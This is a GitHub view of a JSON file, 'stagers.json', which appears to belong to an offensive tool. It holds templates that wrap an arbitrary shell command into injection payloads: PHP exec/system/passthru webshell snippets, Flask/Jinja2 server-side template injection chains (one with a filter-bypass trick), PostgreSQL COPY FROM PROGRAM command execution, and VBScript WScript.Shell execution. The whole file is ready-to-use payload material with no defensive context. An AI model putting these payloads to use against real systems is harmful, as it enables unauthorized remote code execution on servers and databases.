-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathstagers.json
48 lines (48 loc) · 1.49 KB
/
stagers.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
{
"pss": {
"direct": {
"payload": "<<SHELL>>"
}
},
"php": {
"exec": {
"payload": "<?php exec(\"<<SHELL>>\"); ?>"
},
"passthru": {
"payload": "<?php passthru(\"<<SHELL>>\"); ?>"
},
"popen": {
"payload": "<?php popen(\"<<SHELL>>\", \"r\"); ?>"
},
"shell_exec": {
"payload": "<?php shell_exec(\"<<SHELL>>\"); ?>"
},
"singleqoute": {
"payload": "<?php `<<SHELL>>`; ?>"
},
"system": {
"payload": "<?php system(\"<<SHELL>>\"); ?>"
}
},
"flask": {
"ssti-os-system": {
"payload": "{{ self.__init__.__globals__.__builtins__.__import__(\"os\").system(\"<<SHELL>>\") }}"
},
"ssti-os-popen": {
"payload": "{{ self.__init__.__globals__.__builtins__.__import__(\"os\").popen(\"<<SHELL>>\").read() }}"
},
"ssti-os-popen-filter-bypass-join": {
"payload": "{{request|attr(\"application\")|attr([\"_\"*2,\"globals\",\"_\"*2]|join)|attr([\"_\"*2,\"getitem\",\"_\"*2]|join)([\"_\"*2,\"builtins\",\"_\"*2]|join)|attr([\"_\"*2,\"getitem\",\"_\"*2]|join)([\"_\"*2,\"import\",\"_\"*2]|join)(\"os\")|attr(\"popen\")(\"<<SHELL>>\")|attr(\"read\")()}}"
}
},
"postgresql": {
"cmd_exec": {
"payload": "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM '<<SHELL>>'; SELECT * FROM cmd_exec; DROP TABLE IF EXISTS cmd_exec;"
}
},
"vbscript": {
"cmd_exec": {
"payload": "CreateObject(\"WScript.Shell\").Run(\"<<SHELL>>\")"
}
}
}